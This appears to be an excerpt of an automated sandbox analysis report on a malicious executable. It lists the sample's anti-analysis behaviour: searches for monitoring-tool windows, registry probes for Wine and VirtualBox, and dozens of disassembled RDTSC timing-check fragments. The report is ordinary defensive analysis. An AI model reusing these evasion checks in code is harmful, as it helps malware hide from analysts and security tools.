Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2E7A second address: AC2E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2E7E second address: AC2E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2E82 second address: AC2E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push esi 0x0000000f js 00007F1CB4FA4D1Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2E99 second address: AC2EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jng 00007F1CB4F79658h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2EAC second address: AC2EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2EB0 second address: AC2EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2F98 second address: AC2F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2F9C second address: AC2FA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2FA0 second address: AC2FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2FE5 second address: AC2FF4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2FF4 second address: AC2FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC2FF8 second address: AC2FFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD4D4C second address: AD4D53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE173F second address: AE176B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1CB4F79646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F1CB4F79652h 0x00000016 jnl 00007F1CB4F7964Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE189F second address: AE18CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1CB4FA4D28h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1A20 second address: AE1A26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1A26 second address: AE1A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1A31 second address: AE1A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1A38 second address: AE1A4D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1CB4FA4D1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1A4D second address: AE1A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1A51 second address: AE1A57 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1A57 second address: AE1A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1A60 second address: AE1A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4FA4D27h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F1CB4FA4D16h 0x00000014 jo 00007F1CB4FA4D16h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1BF2 second address: AE1BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE1BF8 second address: AE1C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jno 00007F1CB4FA4D16h 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE269B second address: AE26A0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE26A0 second address: AE26CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jmp 00007F1CB4FA4D29h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 push esi 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 popad 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE284E second address: AE2866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4F79652h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD7355 second address: AD7360 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE2985 second address: AE298B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE3356 second address: AE335A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE335A second address: AE336E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1CB4F79646h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F1CB4F79648h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE336E second address: AE3397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4FA4D1Ch 0x00000009 jmp 00007F1CB4FA4D29h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE3397 second address: AE33AE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1CB4F79646h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f jg 00007F1CB4F7964Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE7C47 second address: AE7C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE7C4B second address: AE7C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jc 00007F1CB4F79646h 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 jmp 00007F1CB4F7964Dh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE7C6F second address: AE7C79 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1CB4FA4D2Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEE4C6 second address: AEE4CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEE92F second address: AEE939 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1CB4FA4D16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEEEC5 second address: AEEED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jp 00007F1CB4F7964Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEEED9 second address: AEEEDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF1496 second address: AF149A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF1893 second address: AF1898 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF1B79 second address: AF1B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2012 second address: AF2019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2019 second address: AF2056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], ebx 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F1CB4F79648h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov edi, dword ptr [ebp+122D2BD9h] 0x0000002b push eax 0x0000002c jo 00007F1CB4F79654h 0x00000032 push eax 0x00000033 push edx 0x00000034 jnl 00007F1CB4F79646h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF252B second address: AF253D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F1CB4FA4D18h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF25C0 second address: AF25C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2AD2 second address: AF2AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2AD7 second address: AF2ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2ADD second address: AF2B20 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1CB4FA4D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F1CB4FA4D18h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 sub dword ptr [ebp+122D1D2Bh], esi 0x0000002f push 00000000h 0x00000031 add esi, 2AAAAF9Ah 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2B20 second address: AF2B26 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF2B26 second address: AF2B48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1CB4FA4D24h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF4EA6 second address: AF4EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF59EF second address: AF59F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF59F4 second address: AF5A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov si, 4065h 0x0000000e push 00000000h 0x00000010 pushad 0x00000011 mov ebx, esi 0x00000013 xor dword ptr [ebp+122D2937h], ebx 0x00000019 popad 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D39E3h], esi 0x00000022 mov edi, dword ptr [ebp+122D1C2Dh] 0x00000028 xchg eax, ebx 0x00000029 push ebx 0x0000002a jmp 00007F1CB4F7964Dh 0x0000002f pop ebx 0x00000030 push eax 0x00000031 jo 00007F1CB4F79650h 0x00000037 pushad 0x00000038 push ebx 0x00000039 pop ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF6297 second address: AF62A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F1CB4FA4D16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF62A1 second address: AF632C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F1CB4F79659h 0x0000000e nop 0x0000000f and esi, dword ptr [ebp+122D2CADh] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F1CB4F79648h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 mov edi, dword ptr [ebp+122D315Fh] 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F1CB4F79648h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Dh 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 xchg eax, ebx 0x00000054 push eax 0x00000055 push edx 0x00000056 jc 00007F1CB4F79653h 0x0000005c jmp 00007F1CB4F7964Dh 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF6B17 second address: AF6B21 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CB4FA4D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF94DD second address: AF94E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA2BB second address: AFA2DE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1CB4FA4D22h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jo 00007F1CB4FA4D16h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA2DE second address: AFA2F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1CB4F7964Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA752 second address: AFA757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA757 second address: AFA765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA765 second address: AFA769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA769 second address: AFA778 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F7964Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA778 second address: AFA7D3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1CB4FA4D1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ebx, 1E029FF8h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F1CB4FA4D18h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c movzx ebx, cx 0x0000002f push 00000000h 0x00000031 movsx edi, si 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F1CB4FA4D29h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA7D3 second address: AFA7DD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1CB4F79646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFA7DD second address: AFA7E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFBBCA second address: AFBBD4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1CB4F79646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDB20 second address: AFDB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFBBD4 second address: AFBBDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F1CB4F79646h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDB24 second address: AFDB41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F1CB4FA4D1Eh 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDB41 second address: AFDBF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79654h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b mov ebx, dword ptr [ebp+122D2D2Dh] 0x00000011 jmp 00007F1CB4F7964Bh 0x00000016 push dword ptr fs:[00000000h] 0x0000001d clc 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 ja 00007F1CB4F79657h 0x0000002b movsx edi, dx 0x0000002e mov eax, dword ptr [ebp+122D0799h] 0x00000034 push 00000000h 0x00000036 push ebp 0x00000037 call 00007F1CB4F79648h 0x0000003c pop ebp 0x0000003d mov dword ptr [esp+04h], ebp 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc ebp 0x0000004a push ebp 0x0000004b ret 0x0000004c pop ebp 0x0000004d ret 0x0000004e js 00007F1CB4F7964Bh 0x00000054 adc bx, 1245h 0x00000059 mov bx, 106Fh 0x0000005d push FFFFFFFFh 0x0000005f and ebx, dword ptr [ebp+122D2E01h] 0x00000065 nop 0x00000066 jnp 00007F1CB4F7966Ah 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F1CB4F79658h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFFA40 second address: AFFA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDBF4 second address: AFDBF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B008C4 second address: B008DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4FA4D24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFFA45 second address: AFFA4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F1CB4F79646h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFDBF8 second address: AFDC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jc 00007F1CB4FA4D28h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F1CB4FA4D16h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B008DC second address: B008E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFFA4F second address: AFFA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B046F8 second address: B046FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B046FE second address: B04748 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CB4FA4D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+122D2D39h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F1CB4FA4D18h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 jbe 00007F1CB4FA4D18h 0x00000037 mov edi, edx 0x00000039 push 00000000h 0x0000003b clc 0x0000003c mov di, dx 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push esi 0x00000043 pushad 0x00000044 popad 0x00000045 pop esi 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B04748 second address: B0474E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0474E second address: B04752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
